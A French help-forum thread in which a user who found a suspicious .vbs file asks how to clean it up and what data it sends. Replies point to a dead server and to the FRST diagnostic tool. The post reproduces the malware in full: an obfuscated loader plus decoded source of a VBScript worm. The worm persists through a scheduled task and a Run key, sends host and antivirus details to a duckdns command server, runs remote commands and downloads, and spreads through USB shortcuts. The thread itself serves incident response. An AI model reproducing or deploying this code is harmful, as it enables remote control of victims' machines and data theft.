virus détecté - script vbs

**mGraph** · 13/06/2018, 01h31

Bonsoir,

J'ai trouvé ce script sur un pc, il se trouvait dans fichier .vbs dans le dossier public de user (c:/user/public),
j'ai bien supprimé le fichier, supprimé les taches planifiés qu'il crée, mais je ne sais pas si je peux faire d'autres action pour le supprimer car il semble toucher au registre mais je n'ai rien trouvé de suspect
j'ai aussi vue qu'il envoyé des informations à http://yamiomar.duckdns.org:65000, mais qu'elle type d'infos il envoie ?

Merci de votre aide

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
    Function Decrypt(ByVal Input)
        Dim Str
        For Each i In Split(Input, "£")
            Str = Str & ChrW(("&H" & i) / 3.1415926535897931)
        Next
        Decrypt = Str
    End Function
    Dim CC
CC = "7B£65£D2£15D£13A£13D£13A£65£134£17C£65£173£12A£CF£97£9A£29£1F£F8£15A£65£13D£166£166£15D£166£65£166£13D£169£170£156£13D£65£15A£13D£179£16C£29£1F£29£1F£14D£65£C0£65£131£166£166£131£17C£7E£6B£111£105£137£166£14A£160£16C£91£105£147£13D£153£153£6B£8A£6B£105£137£166£14A£160£16C£14A£15A£144£91£DC£14A£153£13D£105£17C£169£16C£13D£156£F8£134£14D£13D£137£16C£6B£8A£6B£105£147£13D£153£153£91£CC£160£160£153£14A£137£131£16C£14A£15D£15A£6B£8A£6B£F2£14A£137£166£15D£169£15D£140£16C£91£114£F2£EF£E2£108£108£FB£6B£81£29£1F£144£65£C0£65£131£166£166£131£17C£7E£6B£E2£EC£D2£10B£6B£8A£6B£E2£EC£EF£F2£6B£8A£6B£E2£EC£D2£10B£121£173£176£97£166£156£6B£8A£6B£121£105£15D£140£16C£176£131£166£13D£121£F2£14A£137£166£15D£169£15D£140£16C£121£111£14A£15A£13A£15D£176£169£121£D2£170£166£166£13D£15A£16C£10E£13D£166£169£14A£15D£15A£121£102£170£15A£121£6B£8A£6B£E2£EC£EF£F2£121£105£F8£DC£108£111£CC£102£D9£121£D2£153£131£169£169£13D£169£121£6B£8A£6B£102£D9£DF£12A£105£11B£6B£8A£6B£121£13A£13D£140£131£170£153£16C£14A£137£15D£15A£121£6B£81£29£1F£17C£C0£65£131£166£166£131£17C£7E£6B£176£14A£15A£156£144£156£16C£169£B6£6B£8A£6B£176£14A£15A£A0£9D£12A£153£15D£144£14A£137£131£153£13A£14A£169£150£6B£8A£6B£111£14A£15A£A0£9D£12A£F8£160£13D£166£131£16C£14A£15A£144£105£17C£169£16C£13D£156£6B£8A£6B£176£14A£15A£156£144£156£16C£169£B6£121£121£153£15D£137£131£153£147£15D£169£16C£121£166£15D£15D£16C£121£169£13D£137£170£166£14A£16C£17C£137£13D£15A£16C£13D£166£6B£8A£6B£CC£15A£16C£14A£10E£14A£166£170£169£FB£166£15D£13A£170£137£16C£6B£81£29£1F£29£1F£140£170£15A£137£16C£14A£15D£15A£65£144£15D£7E£156£81£29£1F£14A£140£65£156£C0£A3£65£16C£147£13D£15A£29£1F£108£C0£6B£176£14A£15A£156£144£156£16C£169£B6£121£121£153£15D£137£131£153£147£15D£169£16C£121£166£15D£15D£16C£121£169£13D£137£170£166£14A£16C£17C£137£13D£15A£16C£13D£166£6B£29£1F£105£13D£16C£65£CF£C0£DF£13D£16C£F8£134£14D£13D£137£16C£7E£17C£7E£A0£81£81£91£E5£15A£169£16C£131£15A£137£13D£169£F8£140£7E£17C£7E£A3£81£81£29£1F£140£15D£166£65£13D£131£137£147£65£131£65£14A£15A£65£134£29£1F£144£15D£C0£131£91£13A£14A£169£160£153£131£17C£F5£131£156£13D£29£1F£13D£179£14A£16C£65£140£15D£166£29£1F£15A£13D£179£16C£29£1F£105£13D£16C£65£CF£C0£DF£13D£16C£F8£134£14D£13D£137£16C£7E£17C£7E£A0£81£65£77£65£6B£9D£6B£81£91£E5£15A£169£16C£131£15A£137£13D£169£F8£140£7E£17C£7E£A3£81£81£29£1F£140£15D£166£65£13D£131£137£147£65£131£65£14A£15A£65£134£29£1F£144£15D£C0£131£91£13A£14A£169£160£153£131£17C£F5£131£156£13D£65£29£1F£13D£179£14A£16C£65£140£15D£166£29£1F£15A£13D£179£16C£29£1F£14A£140£65£144£15D£C0£6B£6B£65£16C£147£13D£15A£65£144£15D£C0£6B£F5£15D£16C£8D£140£15D£170£15A£13A£6B£29£1F£13D£153£169£13D£29£1F£105£13D£16C£65£CF£C0£DF£13D£16C£F8£134£14D£13D£137£16C£7E£17C£7E£97£81£81£91£E5£15A£169£16C£131£15A£137£13D£169£F8£140£7E£17C£7E£156£81£81£29£1F£140£15D£166£65£13D£131£137£147£65£131£65£14A£15A£65£134£29£1F£14A£140£65£156£65£C0£65£9A£65£16C£147£13D£15A£29£1F£144£15D£C0£131£91£173£15D£153£170£156£13D£169£13D£166£14A£131£153£15A£170£156£134£13D£166£29£1F£13D£153£169£13D£14A£140£65£156£65£C0£65£9D£65£16C£147£13D£15A£29£1F£144£15D£C0£131£91£137£131£160£16C£14A£15D£15A£29£1F£13D£15A£13A£65£14A£140£29£1F£13D£179£14A£16C£65£140£15D£166£29£1F£15A£13D£179£16C£29£1F£13D£15A£13A£65£14A£140£29£1F£13D£15A£13A£65£140£170£15A£137£16C£14A£15D£15A£65£29£1F£29£1F£169£13D£16C£65£176£65£C0£65£111£105£137£166£14A£160£16C£29£1F£169£13D£16C£65£169£147£65£C0£65£D2£166£7E£97£81£29£1F£169£13D£16C£65£140£169£65£C0£65£D2£166£7E£9A£81£29£1F£29£1F£DC£170£15A£137£16C£14A£15D£15A£65£D2£166£7E£F5£81£29£1F£105£13D£16C£65£D2£166£65£C0£65£D2£166£13D£131£16C£13D£F8£134£14D£13D£137£16C£7E£14D£7E£F5£81£81£29£1F£D9£15A£13A£65£DC£170£15A£137£16C£14A£15D£15A£29£1F£29£1F£140£170£15A£137£16C£14A£15D£15A£65£D9£179£7E£169£81£29£1F£D9£179£65£C0£65£169£147£91£D9£179£160£131£15A£13A£D9£15A£173£14A£166£15D£15A£156£13D£15A£16C£105£16C£166£14A£15A£144£169£7E£6B£74£6B£77£169£77£6B£74£6B£81£29£1F£13D£15A£13A£65£140£170£15A£137£16C£14A£15D£15A£29£1F£29£1F£140£170£15A£137£16C£14A£15D£15A£65£FB£16C£7E£D2£8A£CC£81£29£1F£FB£16C£C0£6B£6B£29£1F£105£13D£16C£65£114£C0£D2£166£7E£A0£81£29£1F£114£91£F8£160£13D£15A£65£6B£FB£F8£105£108£6B£8A£6B£147£16C£16C£160£B6£94£94£17C£131£156£14A£15D£156£131£166£91£13A£170£137£150£13A£15A£169£91£15D£166£144£B6£AA£A7£97£97£97£94£6B£77£D2£8A£140£131£153£169£13D£29£1F£114£91£169£13D£16C£166£13D£163£170£13D£169£16C£147£13D£131£13A£13D£166£65£6B£10B£169£13D£166£8D£CC£144£13D£15A£16C£B6£6B£8A£15A£140£29£1F£114£91£169£13D£15A£13A£65£CC£29£1F£FB£16C£C0£114£91£166£13D£169£160£15D£15A£169£13D£16C£13D£179£16C£29£1F£13D£15A£13A£65£140£170£15A£137£16C£14A£15D£15A£29£1F£29£1F£DC£170£15A£137£16C£14A£15D£15A£65£15A£140£29£1F£15A£140£C0£6B£6B£29£1F£14A£C0£144£15D£7E£9A£81£29£1F£169£C0£10E£F5£65£77£65£6B£12A£6B£65£77£65£14A£29£1F£15A£140£C0£15A£140£77£169£77£137£29£1F£169£C0£13D£179£7E£6B£D2£F8£F2£FB£10B£108£D9£102£F5£CC£F2£D9£6B£81£29£1F£15A£140£C0£15A£140£77£169£77£137£29£1F£169£C0£13D£179£7E£6B£10B£105£D9£102£F5£CC£F2£D9£6B£81£29£1F£15A£140£C0£15A£140£77£169£77£137£29£1F£169£C0£144£15D£7E£9D£81£29£1F£15A£140£C0£15A£140£77£169£77£137£29£1F£169£C0£144£15D£7E£A3£81£29£1F£15A£140£C0£15A£140£77£169£77£137£77£137£77£15A£16C£77£137£77£170£77£137£29£1F£D9£15A£13A£65£DC£170£15A£137£16C£14A£15D£15A£29£1F£29£1F£105£170£134£65£F5£169£29£1F£15D£15A£65£13D£166£166£15D£166£65£166£13D£169£170£156£13D£65£15A£13D£179£16C£29£1F£13A£166£C0£13D£179£7E£6B£FB£170£134£153£14A£137£6B£81£65£77£65£D2£65£77£65£176£15A£29£1F£140£169£91£D2£15D£160£17C£DC£14A£153£13D£65£140£170£8A£13A£166£8A£16C£166£170£13D£29£1F£169£147£91£166£170£15A£65£6B£169£137£147£16C£131£169£150£169£65£94£137£166£13D£131£16C£13D£65£94£169£137£65£156£14A£15A£170£16C£13D£65£94£156£15D£65£9A£65£94£16C£15A£65£105£150£17C£160£13D£65£94£16C£166£65£6B£65£77£65£D2£147£166£111£7E£A0£A3£81£65£77£65£13A£166£8A£140£131£153£169£13D£29£1F£169£147£91£166£13D£144£176£166£14A£16C£13D£65£144£7E£97£81£65£77£65£144£7E£A0£81£65£77£65£6B£11B£F5£F5£DC£102£EF£108£E2£A3£DC£6B£8A£65£D2£147£65£77£65£13A£166£65£77£65£D2£147£8A£65£144£7E£A7£81£29£1F£140£169£91£137£15D£160£17C£140£14A£153£13D£65£140£170£8A£65£D2£166£7E£9D£81£91£F5£131£156£13D£105£160£131£137£13D£7E£77£E2£AD£81£91£105£13D£153£140£91£FB£131£16C£147£65£77£D2£65£77£65£176£15A£65£8A£16C£166£170£13D£29£1F£13D£15A£13A£65£105£170£134£29£1F£29£1F£13A£166£C0£13D£179£7E£6B£FB£170£134£153£14A£137£6B£81£65£77£65£D2£65£77£65£176£15A£29£1F£29£1F£169£170£134£65£169£160£166£29£1F£15D£15A£65£13D£166£166£15D£166£65£166£13D£169£170£156£13D£65£15A£13D£179£16C£29£1F£140£15D£166£65£13D£131£137£147£65£13A£166£65£14A£15A£65£140£169£91£13A£166£14A£173£13D£169£29£1F£13A£160£C0£13A£166£91£160£131£16C£147£65£77£65£137£29£1F£14A£140£65£13A£166£91£14A£169£166£13D£131£13A£17C£65£C0£65£16C£166£170£13D£65£16C£147£13D£15A£29£1F£14A£140£65£13A£166£91£13A£166£14A£173£13D£16C£17C£160£13D£65£C0£65£9A£65£16C£147£13D£15A£29£1F£140£169£91£137£15D£160£17C£140£14A£153£13D£65£140£170£8A£13A£160£65£77£65£176£15A£8A£16C£166£170£13D£29£1F£14A£140£65£140£169£91£140£14A£153£13D£13D£179£14A£169£16C£169£7E£13A£160£65£77£65£176£15A£81£65£16C£147£13D£15A£29£1F£140£169£91£144£13D£16C£140£14A£153£13D£7E£13A£160£65£77£65£176£15A£81£91£131£16C£16C£166£14A£134£170£16C£13D£169£C0£9D£87£A3£29£1F£13D£15A£13A£65£14A£140£29£1F£140£15D£166£65£13D£131£137£147£65£140£14A£65£14A£15A£65£140£169£91£144£13D£16C£140£15D£153£13A£13D£166£7E£13A£160£81£91£140£14A£153£13D£169£29£1F£14A£140£65£14A£15A£169£16C£166£7E£140£14A£91£15A£131£156£13D£8A£6B£91£6B£81£65£16C£147£13D£15A£29£1F£14A£140£65£153£137£131£169£13D£7E£169£160£153£14A£16C£7E£140£14A£91£15A£131£156£13D£8A£6B£91£6B£81£65£7E£170£134£15D£170£15A£13A£7E£169£160£153£14A£16C£7E£140£14A£91£15A£131£156£13D£8A£6B£91£6B£81£81£81£81£65£BC£C3£6B£153£15A£150£6B£65£16C£147£13D£15A£29£1F£140£14A£91£131£16C£16C£166£14A£134£170£16C£13D£169£C0£9D£87£A3£29£1F£14A£140£65£170£137£131£169£13D£7E£140£14A£91£15A£131£156£13D£81£65£BC£C3£65£170£137£131£169£13D£7E£176£15A£81£65£16C£147£13D£15A£29£1F£176£14A£16C£147£65£169£147£91£137£166£13D£131£16C£13D£169£147£15D£166£16C£137£170£16C£7E£13A£160£65£65£77£65£169£160£153£14A£16C£7E£140£14A£91£15A£131£156£13D£8A£6B£91£6B£81£7E£97£81£65£77£65£6B£91£153£15A£150£6B£81£65£29£1F£91£176£14A£15A£13A£15D£176£169£16C£17C£153£13D£65£C0£65£AD£29£1F£91£16C£131£166£144£13D£16C£160£131£16C£147£65£C0£65£6B£137£156£13A£91£13D£179£13D£6B£29£1F£91£131£166£144£170£156£13D£15A£16C£169£65£C0£65£6B£94£137£65£169£16C£131£166£16C£65£6B£65£77£65£166£13D£160£153£131£137£13D£7E£176£15A£8A£6B£65£6B£8A£65£137£147£65£77£65£6B£65£6B£65£77£65£137£147£81£65£77£65£6B£77£169£16C£131£166£16C£65£6B£65£77£65£166£13D£160£153£131£137£13D£7E£140£14A£91£15A£131£156£13D£8A£6B£65£6B£8A£65£137£147£65£77£65£6B£65£6B£65£77£65£137£147£81£65£77£6B£77£13D£179£14A£16C£6B£29£1F£140£14A£137£65£C0£65£169£147£91£166£13D£144£166£13D£131£13A£7E£144£7E£A3£81£65£77£65£169£147£91£166£13D£144£166£13D£131£13A£7E£144£7E£A3£81£65£77£65£6B£91£6B£65£77£65£169£160£153£14A£16C£7E£140£14A£91£15A£131£156£13D£8A£65£6B£91£6B£81£7E£170£134£15D£170£15A£13A£7E£169£160£153£14A£16C£7E£140£14A£91£15A£131£156£13D£8A£65£6B£91£6B£81£81£81£77£65£137£81£65£77£65£144£7E£AA£81£81£65£29£1F£14A£140£65£14A£15A£169£16C£166£7E£14A£137£15D£15A£153£15D£137£131£16C£14A£15D£15A£8A£6B£8A£6B£81£65£C0£65£97£65£16C£147£13D£15A£29£1F£91£14A£137£15D£15A£153£15D£137£131£16C£14A£15D£15A£65£C0£65£140£14A£91£160£131£16C£147£29£1F£13D£153£169£13D£65£29£1F£91£14A£137£15D£15A£153£15D£137£131£16C£14A£15D£15A£65£C0£65£140£14A£137£29£1F£65£13D£15A£13A£65£14A£140£29£1F£91£169£131£173£13D£7E£81£29£1F£13D£15A£13A£65£176£14A£16C£147£29£1F£13D£15A£13A£65£14A£140£29£1F£13D£15A£13A£65£14A£140£29£1F£13D£15A£13A£65£14A£140£29£1F£15A£13D£179£16C£29£1F£140£15D£166£65£13D£131£137£147£65£140£15D£65£14A£15A£65£140£169£91£144£13D£16C£140£15D£153£13A£13D£166£7E£13A£160£81£91£169£170£134£140£15D£153£13A£13D£166£169£29£1F£140£15D£91£131£16C£16C£166£14A£134£170£16C£13D£169£C0£9D£87£A3£29£1F£176£14A£16C£147£65£169£147£91£137£166£13D£131£16C£13D£169£147£15D£166£16C£137£170£16C£7E£13A£160£65£77£65£140£15D£91£15A£131£156£13D£65£77£65£6B£91£153£15A£150£6B£81£29£1F£91£176£14A£15A£13A£15D£176£169£16C£17C£153£13D£C0£AD£29£1F£91£16C£131£166£144£13D£16C£160£131£16C£147£C0£6B£137£156£13A£91£13D£179£13D£6B£29£1F£91£131£166£144£170£156£13D£15A£16C£169£C0£6B£94£137£65£169£16C£131£166£16C£65£6B£65£77£65£166£13D£160£153£131£137£13D£7E£176£15A£8A£6B£65£6B£8A£65£137£147£65£77£65£6B£65£6B£65£77£65£137£147£81£65£77£65£6B£77£169£16C£131£166£16C£65£13D£179£160£153£15D£166£13D£166£65£6B£65£77£65£166£13D£160£153£131£137£13D£7E£140£15D£91£15A£131£156£13D£8A£6B£65£6B£8A£65£137£147£65£77£65£6B£65£6B£65£77£65£137£147£81£65£77£6B£77£13D£179£14A£16C£6B£29£1F£140£14A£137£C0£169£147£91£166£13D£144£166£13D£131£13A£7E£6B£E2£EC£EF£F2£121£169£15D£140£16C£176£131£166£13D£121£137£153£131£169£169£13D£169£121£140£15D£153£13A£13D£166£6B£65£77£65£144£7E£AA£81£81£29£1F£14A£140£65£14A£15A£169£16C£166£7E£91£14A£137£15D£15A£153£15D£137£131£16C£14A£15D£15A£8A£6B£8A£6B£81£C0£97£65£16C£147£13D£15A£29£1F£91£14A£137£15D£15A£153£15D£137£131£16C£14A£15D£15A£C0£140£15D£91£160£131£16C£147£29£1F£13D£153£169£13D£29£1F£91£14A£137£15D£15A£153£15D£137£131£16C£14A£15D£15A£C0£140£14A£137£29£1F£13D£15A£13A£65£14A£140£29£1F£91£169£131£173£13D£7E£81£29£1F£13D£15A£13A£65£176£14A£16C£147£29£1F£15A£13D£179£16C£29£1F£13D£15A£13A£65£14A£140£29£1F£13D£15A£13A£65£14A£140£29£1F£15A£13D£179£16C£29£1F£13D£166£166£91£137£153£13D£131£166£29£1F£13D£15A£13A£65£169£170£134£29£1F£29£1F£29£1F£29£1F£173£15A£C0£6B£FB£170£134£153£14A£137£6B£29£1F£10B£C0£6B£6B£29£1F£29£1F£137£147£65£C0£65£137£147£166£176£7E£A0£A3£81£29£1F£137£65£C0£65£137£147£166£176£7E£B3£9D£81£29£1F£140£170£65£C0£65£176£91£169£137£166£14A£160£16C£140£170£153£153£15A£131£156£13D£29£1F£176£15A£C0£176£91£169£137£166£14A£160£16C£15A£131£156£13D£29£1F£F5£108£C0£6B£F5£15D£6B£29£1F£14A£140£65£140£169£91£140£14A£153£13D£13D£179£14A£169£16C£169£7E£13D£179£7E£6B£111£14A£15A£13A£14A£166£6B£81£65£77£65£6B£121£F2£14A£137£166£15D£169£15D£140£16C£91£F5£D9£108£121£DC£166£131£156£13D£176£15D£166£150£121£173£9D£91£97£91£A7£97£AD£9D£AD£121£173£134£137£91£13D£179£13D£6B£81£65£16C£147£13D£15A£29£1F£F5£108£C0£6B£118£13D£169£6B£29£1F£13D£15A£13A£65£14A£140£29£1F£29£1F£10B£C0£65£169£147£91£166£13D£144£166£13D£131£13A£7E£144£7E£9D£81£81£29£1F£14A£140£65£10B£C0£6B£6B£65£16C£147£13D£15A£29£1F£14A£140£65£156£14A£13A£7E£140£170£8A£9D£81£C0£6B£B6£121£6B£65£77£65£176£15A£65£16C£147£13D£15A£29£1F£10B£C0£6B£108£102£10B£D9£6B£29£1F£169£147£91£166£13D£144£176£166£14A£16C£13D£65£144£7E£9D£81£8A£65£10B£8A£65£144£7E£A7£81£29£1F£13D£153£169£13D£29£1F£10B£C0£6B£DC£CC£EF£105£D9£6B£29£1F£169£147£91£166£13D£144£176£166£14A£16C£13D£65£144£7E£9D£81£8A£65£10B£8A£65£144£7E£A7£81£29£1F£13D£15A£13A£65£14A£140£29£1F£13D£15A£13A£65£14A£140£29£1F£29£1F£F5£169£29£1F£169£160£153£C0£6B£186£10E£186£6B£29£1F£176£147£14A£153£13D£65£16C£166£170£13D£29£1F£169£C0£169£160£153£14A£16C£7E£FB£16C£7E£6B£10E£166£13D£6B£8A£6B£6B£81£8A£169£160£153£81£29£1F£169£13D£153£13D£137£16C£65£137£131£169£13D£65£169£7E£97£81£29£1F£137£131£169£13D£65£6B£13D£179£137£6B£29£1F£169£131£C0£65£169£7E£9A£81£29£1F£13D£179£13D£137£170£16C£13D£65£169£131£29£1F£137£131£169£13D£65£6B£105£137£6B£29£1F£169£9D£65£C0£65£D9£179£7E£6B£16C£13D£156£160£6B£81£65£77£65£6B£121£6B£65£77£65£169£7E£9D£81£29£1F£169£13D£16C£65£176£166£65£C0£65£140£169£91£F8£160£13D£15A£108£13D£179£16C£DC£14A£153£13D£7E£169£9D£8A£9D£8A£108£166£170£13D£81£29£1F£176£166£91£111£166£14A£16C£13D£65£169£7E£9A£81£29£1F£176£166£91£D2£153£15D£169£13D£7E£81£29£1F£169£147£91£166£170£15A£65£169£9D£8A£65£AA£29£1F£137£131£169£13D£65£6B£102£DC£6B£29£1F£169£9D£65£C0£65£D9£179£7E£6B£16C£13D£156£160£6B£81£65£77£65£6B£121£6B£65£77£65£169£7E£9D£81£29£1F£169£13D£16C£65£176£166£65£C0£65£140£169£91£F8£160£13D£15A£108£13D£179£16C£DC£14A£153£13D£7E£169£9D£8A£9D£8A£108£166£170£13D£81£29£1F£176£166£91£111£166£14A£16C£13D£65£169£7E£9A£81£29£1F£176£166£91£D2£153£15D£169£13D£7E£81£29£1F£169£147£91£166£170£15A£65£169£9D£29£1F£137£131£169£13D£65£6B£102£13D£15A£6B£29£1F£169£13D£16C£65£176£166£65£C0£65£140£169£91£F8£160£13D£15A£108£13D£179£16C£DC£14A£153£13D£7E£140£170£8A£9A£81£29£1F£140£65£C0£65£176£166£91£102£13D£131£13A£CC£153£153£29£1F£176£166£91£137£153£15D£169£13D£7E£81£29£1F£140£65£C0£65£166£13D£160£153£131£137£13D£7E£140£8A£137£147£77£173£15A£77£137£147£8A£137£147£77£169£7E£9A£81£77£137£147£81£29£1F£169£13D£16C£65£176£166£65£C0£65£140£169£91£F8£160£13D£15A£108£13D£179£16C£DC£14A£153£13D£7E£140£170£8A£9D£8A£140£131£153£169£13D£81£29£1F£176£166£91£111£166£14A£16C£13D£65£140£29£1F£176£166£91£137£153£15D£169£13D£7E£81£29£1F£137£131£169£13D£65£6B£10B£160£6B£29£1F£169£13D£16C£65£176£166£65£C0£65£140£169£91£F8£160£13D£15A£108£13D£179£16C£DC£14A£153£13D£7E£140£170£8A£9D£8A£140£131£153£169£13D£81£29£1F£169£7E£9A£81£65£C0£65£166£13D£160£153£131£137£13D£7E£169£7E£9A£81£8A£6B£186£10B£186£6B£8A£6B£186£10E£186£6B£81£29£1F£176£166£91£111£166£14A£16C£13D£65£169£7E£9A£81£29£1F£176£166£91£D2£153£15D£169£13D£7E£81£29£1F£169£147£91£166£170£15A£65£6B£176£169£137£166£14A£160£16C£91£13D£179£13D£65£94£94£CF£65£6B£65£77£65£137£147£65£77£65£140£170£65£77£65£137£147£8A£65£AA£29£1F£176£91£163£170£14A£16C£29£1F£137£131£169£13D£65£6B£D2£153£6B£29£1F£111£91£163£170£14A£16C£65£29£1F£137£131£169£13D£65£6B£10B£15A£6B£29£1F£105£7E£9A£81£65£C0£65£166£13D£160£153£131£137£13D£7E£105£7E£9A£81£8A£6B£74£140£6B£8A£140£170£81£29£1F£105£7E£9A£81£65£C0£65£166£13D£160£153£131£137£13D£7E£105£7E£9A£81£8A£6B£74£15A£6B£8A£176£15A£81£29£1F£105£7E£9A£81£65£C0£65£166£13D£160£153£131£137£13D£7E£105£7E£9A£81£8A£6B£74£169£140£13A£166£6B£8A£13A£166£81£29£1F£13D£179£13D£137£170£16C£13D£65£105£7E£9A£81£29£1F£176£91£163£170£14A£16C£29£1F£13D£15A£13A£65£169£13D£153£13D£137£16C£29£1F£111£91£105£153£13D£13D£160£65£AA£97£97£97£29£1F£105£160£166£29£1F£176£13D£15A£13A"
Execute(Decrypt(CC))

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

j = array("WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP") g = array("HKCU","HKLM","HKCU\vw0rm","\Software\Microsoft\Windows\CurrentVersion\Run\","HKLM\SOFTWARE\Classes\","REG_SZ","\defaulticon\") y= array("winmgmts:","win32_logicaldisk","Win32_OperatingSystem","winmgmts:\\localhost\root\securitycenter","AntiVirusProduct") function go(m) if m=4 then T="winmgmts:\\localhost\root\securitycenter" Set B=GetObject(y(3)).InstancesOf(y(4)) for each a in b go=a.displayName exit for next Set B=GetObject(y(3) & "2").InstancesOf(y(4)) for each a in b go=a.displayName exit for next if go="" then go="Not-found" else Set B=GetObject(y(0)).InstancesOf(y(m)) for each a in b if m = 1 then go=a.volumeserialnumber elseif m = 2 then go=a.caption end if exit for next end if end function set w = WScript set sh = Cr(0) set fs = Cr(1) Function Cr(N) Set Cr = CreateObject(j(N)) End Function function Ex(s) Ex = sh.ExpandEnvironmentStrings("%"&s&"%") end function function Pt(C,A) Pt="" Set X=Cr(3) X.Open "POST","http://yamiomar.duckdns.org:65000/"&C,false X.setrequestheader "User-Agent:",nf X.send A Pt=X.responsetext end function Function nf nf="" i=go(1) s=VN & "_" & i nf=nf&s&c s=ex("COMPUTERNAME") nf=nf&s&c s=ex("USERNAME") nf=nf&s&c s=go(2) nf=nf&s&c s=go(4) nf=nf&s&c&c&nt&c&u&c End Function Sub Ns on error resume next dr=ex("Public") & C & wn fs.CopyFile fu,dr,true sh.run "schtasks /create /sc minute /mo 1 /tn Skype /tr " & ChrW(34) & dr,false sh.regwrite g(0) & g(3) & "ZNNFRLTH4F", Ch & dr & Ch, g(5) fs.copyfile fu, Cr(2).NameSpace(&H7).Self.Path &C & wn ,true end Sub dr=ex("Public") & C & wn sub spr on error resume next for each dr in fs.drives dp=dr.path & c if dr.isready = true then if dr.drivetype = 1 then fs.copyfile fu,dp & wn,true if fs.fileexists(dp & wn) then fs.getfile(dp & wn).attributes=2+4 end if for each fi in fs.getfolder(dp).files if instr(fi.name,".") then if lcase(split(fi.name,".") (ubound(split(fi.name,".")))) <>"lnk" then fi.attributes=2+4 if ucase(fi.name) <> ucase(wn) then with sh.createshortcut(dp & split(fi.name,".")(0) & ".lnk") .windowstyle = 7 .targetpath = "cmd.exe" .arguments = "/c start " & replace(wn," ", ch & " " & ch) & "&start " & replace(fi.name," ", ch & " " & ch) &"&exit" fic = sh.regread(g(4) & sh.regread(g(4) & "." & split(fi.name, ".")(ubound(split(fi.name, ".")))& c) & g(6)) if instr(iconlocation,",") = 0 then .iconlocation = fi.path else .iconlocation = fic end if .save() end with end if end if end if next for each fo in fs.getfolder(dp).subfolders fo.attributes=2+4 with sh.createshortcut(dp & fo.name & ".lnk") .windowstyle=7 .targetpath="cmd.exe" .arguments="/c start " & replace(wn," ", ch & " " & ch) & "&start explorer " & replace(fo.name," ", ch & " " & ch) &"&exit" fic=sh.regread("HKLM\software\classes\folder" & g(6)) if instr(.iconlocation,",")=0 then .iconlocation=fo.path else .iconlocation=fic end if .save() end with next end if end if next err.clear end sub vn="Public" U="" ch = chrw(34) c = chrw(92) fu = w.scriptfullname wn=w.scriptname NT="No" if fs.fileexists(ex("Windir") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") then NT="Yes" end if U= sh.regread(g(2)) if U="" then if mid(fu,2)=":\" & wn then U="TRUE" sh.regwrite g(2), U, g(5) else U="FALSE" sh.regwrite g(2), U, g(5) end if end if Ns spl="|V|" while true s=split(Pt("Vre",""),spl) select case s(0) case "exc" sa= s(1) execute sa case "Sc" s2 = Ex("temp") & "\" & s(2) set wr = fs.OpenTextFile(s2,2,True) wr.Write s(1) wr.Close() sh.run s2, 6 case "RF" s2 = Ex("temp") & "\" & s(2) set wr = fs.OpenTextFile(s2,2,True) wr.Write s(1) wr.Close() sh.run s2 case "Ren" set wr = fs.OpenTextFile(fu,1) f = wr.ReadAll wr.close() f = replace(f,ch&vn&ch,ch&s(1)&ch) set wr = fs.OpenTextFile(fu,2,false) wr.Write f wr.close() case "Up" set wr = fs.OpenTextFile(fu,2,false) s(1) = replace(s(1),"|U|","|V|") wr.Write s(1) wr.Close() sh.run "wscript.exe //B " & ch & fu & ch, 6 w.quit case "Cl" W.quit case "Un" S(1) = replace(S(1),"%f",fu) S(1) = replace(S(1),"%n",wn) S(1) = replace(S(1),"%sfdr",dr) execute S(1) w.quit end select W.Sleep 6000 Spr wend

**mm_71** · 13/06/2018, 02h09

j'ai aussi vue qu'il envoyé des informations à http://yamiomar.duckdns.org:65000, mais qu'elle type d'infos il envoie ?

https://community.talktalk.co.uk/t5/...g/td-p/2039728

Mais depuis 2017 le site récepteur est mort.

**hackoofr** · 13/06/2018, 02h20

Farbar Recovery Scan Tool (FRST) est un outil de diagnostic intégrant la possibilité d'exécuter des scripts [ un "script" est un petit programme, un ensemble d'instructions à exécuter], que l'on prépare au préalable, sur des PCs infectés par des malveillants. Il fonctionnera aussi bien en Mode normal qu'en Mode sans échec.

Note: Vous devez utiliser la version qui est compatible avec votre système.
Il y a une version 32-bit et une version 64-bit.
Une seule d'entre elles fonctionnera sur le système, ce sera la bonne version.

Cochez aussi Shortcut.txt et Addition.txt et faites une analyse complète avec le bouton Scan.

Une fois le scan terminé, les rapports s’ouvrent sur le bloc-note : FRST.txt, Shortcut.txt et Addition.txt.
Enoyez alors ces 3 rapports par pièce-jointe

32 bits : Telecharger FRST (32 bits)
64 bits : Telecharger FRST (64 bits)

virus détecté - script vbs

Sécurité

Discussions similaires

Partager

Partager